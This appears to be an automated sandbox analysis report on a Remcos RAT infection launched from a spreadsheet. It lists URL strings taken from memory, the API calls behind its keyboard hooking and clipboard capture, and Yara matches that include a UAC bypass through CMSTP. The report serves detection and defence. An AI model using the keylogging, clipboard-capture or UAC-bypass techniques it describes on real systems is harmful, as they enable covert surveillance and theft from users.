Source: bhvA870.tmp.10.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813506737.00000000002A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 0000000C.00000002.813423105.00000000001DC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://www.msn.com/
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 0000000A.00000002.816856030.0000000000224000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://contextual.media.net/
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: svchost.exe, 0000000A.00000003.816775891.0000000001D6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.816934273.0000000001D6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com
Source: svchost.exe, 0000000A.00000003.816695888.0000000001D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bhvA870.tmp.10.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

7_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

3_2_00A6EAFF

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	3_2_00A6ED6A
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DBED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	6_2_00DBED6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	7_2_004168C1

Source: C:\Users\user\AppData\Roaming\CKK.exe

3_2_00A6EAFF

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A5AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

3_2_00A5AA57

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		3_2_00A89576
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DD9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		6_2_00DD9576

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE	Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
